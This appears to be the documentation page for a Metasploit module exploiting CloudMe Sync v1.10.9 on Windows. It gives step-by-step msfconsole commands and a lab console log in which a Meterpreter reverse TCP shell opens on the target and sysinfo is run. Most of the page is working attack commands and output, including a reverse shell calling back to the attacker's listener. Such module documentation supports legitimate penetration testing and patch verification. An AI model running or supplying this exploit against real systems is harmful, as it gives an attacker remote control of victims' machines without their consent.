2.0 KiB
2.0 KiB
Verification Steps
1. Install CloudMe for Desktop version `v1.10.9`
- Create a free account and start the applicaton
- Start
msfconsole4. Douse exploit/windows/misc/cloudme_sync5. Doset RHOST ip - Do
set PAYLOAD windows/meterpreter/reverse_tcp - Do
set LHOST ip - Do
exploit - Verify the Meterpreter session is opened
Scenarios
CloudMe Sync client application on Windows 7 SP1
msf > use exploit/windows/misc/cloudme_sync
msf exploit(windows/misc/cloudme_sync) > show options
Module options (exploit/windows/misc/cloudme_sync):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.40.148 yes The target address
RPORT 8888 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.40.5 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 CloudMe Sync v1.10.9
msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
RHOST => 172.16.40.148
msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(windows/misc/cloudme_sync) > exploit
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Sending stage (179779 bytes) to 172.16.40.148
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
meterpreter > sysinfo
Computer : PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >